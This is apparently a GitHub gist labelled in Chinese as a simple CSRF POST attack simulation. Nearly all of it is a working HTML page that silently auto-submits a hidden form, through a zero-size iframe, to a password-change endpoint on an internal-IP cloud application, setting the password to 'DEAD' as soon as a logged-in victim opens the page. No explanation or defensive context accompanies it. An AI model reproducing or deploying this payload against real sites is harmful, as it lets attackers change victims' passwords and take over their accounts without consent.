Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
一个简单的csrf post攻击模拟
<html>
<head>
<title>TEST</title>
</head>
<body onload="load()">
<form action="http://172.22.54.92:9090/cloud/index.php?r=setting/api/ChangeUnstPwd" target="form_iframe" id="csrf" method="post">
<input type="hidden" name="newPwd" value="DEAD" />
</form>
<iframe name="form_iframe" width="0" height="0" scrolling="no"> </iframe>
<script type="text/javascript" language="javascript">
document.getElementById('csrf').submit();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.